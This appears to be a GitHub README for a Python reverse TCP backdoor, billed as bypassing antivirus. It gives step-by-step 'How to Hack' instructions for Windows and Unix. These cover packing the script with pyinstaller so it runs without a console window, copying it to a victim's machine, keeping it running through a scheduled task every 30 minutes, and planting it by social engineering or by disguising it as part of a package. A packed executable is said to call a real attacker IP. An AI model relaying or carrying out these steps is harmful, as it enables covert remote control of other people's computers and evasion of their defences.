[Bypass AV] Python Reverse TCP: simple reverse tcp backdoor

Python Reverse TCP Shell

• ywang189 – Yiyi Wang
• cjsmith7 – Christian Smith

Multiple files are provided

• reverse_tcp.py
  • malicious python code, run it on victim side.
  • can be packed into “exe” file using pyinstaller and run on Windows with no antivirus software detected (tested on Windows8.1, not detected)
    • On windows, run pyinstaller —noconsole —onefile reverse_tcp.py to pack the malicious reverse_tcp.py to Windows executable file.
• listener.js
  • simple listener wrote in javascript(node.js)
  • Commands
    help
    exit — quit listener
    list — list victims
    connect num — connect to one victim
    eg ‘connect 0’ will connect to the first victim in victim list
    schedule n_minutes — schedule attack(for Windows only), force victim to try to connect to the attacker every n_minutes
• schtasks_template.xml(for Windows hack only)
  • sample template for schtasks program on Windows
  • eg: when scheduling a malicious task from the schtasks_template.xml on Windows, run the following command
    schtasks /CREATE /XML path_to_schtasks_template.xml /TN malicious_task_name
• dist/reverse_tcp.exe
  • packed exe file using pyinstaller mentioned above.
  • don’t run this file on your machine, it is dangerous(as it will connect to my attack machine at ip 45.55.139.173).
• cleanup.bat (for Windows)
  • remove our simple stupid trojan from victim’s system
  • double click it to clean up.

How to Hack (For Windows)

1. Edit the variable attacker_ip in reverse_tcp.py to attacker’s ip address
2. Run pyinstaller –noconsole –onefile reverse_tcp.py to create reverse_tcp.exe
3. Copy reverse_tcp.exe to victim’s machine and execute it. (No console will pop up so don’t worry)
4. Run node listener.js on attacker’s machine to start listening to responses from victims.

How to Hack (For .nix)

1. Edit the variable attacker_ip in reverse_tcp.py to attacker’s ip address
2. Copy reverse_tcp.py to victim’s machine and run python reverse_tcp.py.
3. Run node listener.js to start listening to responses from victims.

General descriptions

• On attacker side, execute node listener.js to run the listener file on attacker’s machine.
• Plant and execute reverse_tcp.py on the victim machine. (SE, camouflage py file as part of package, etc)

How it works(For Windows)

• The reverse_tcp.py(reverse_tcp.exe) file will first copy itself to %Appdata% folder, then create schtasks_template.xml file for scheduling tasks
• It then runs schtasks program and set up the running task so that the victim will try connecting to the attacker every 30 minutes by default.
• After that, the victim will try to connect to attacker’s ip and port.
• The attacker will send commands to the victim, and the victim will execute those commands on their machine.

Why implementing Reverse TCP attack in Python

We first tried Metasploit and used the windows/shell_reverse_tcp payload to generate the malicious exe file and we also tried msfencode to encode the exe file. However, no matter how we encoded the malicious exe file, Windows Defender could always detect it(It is interesting to find out that some 3rd party av couldn’t detect our trojan). After doing some researchers, we found out that Windows Defender will always load the program to memory first then scan it, so encoding will never work.

Demo

Source: https://github.com/shd101wyy/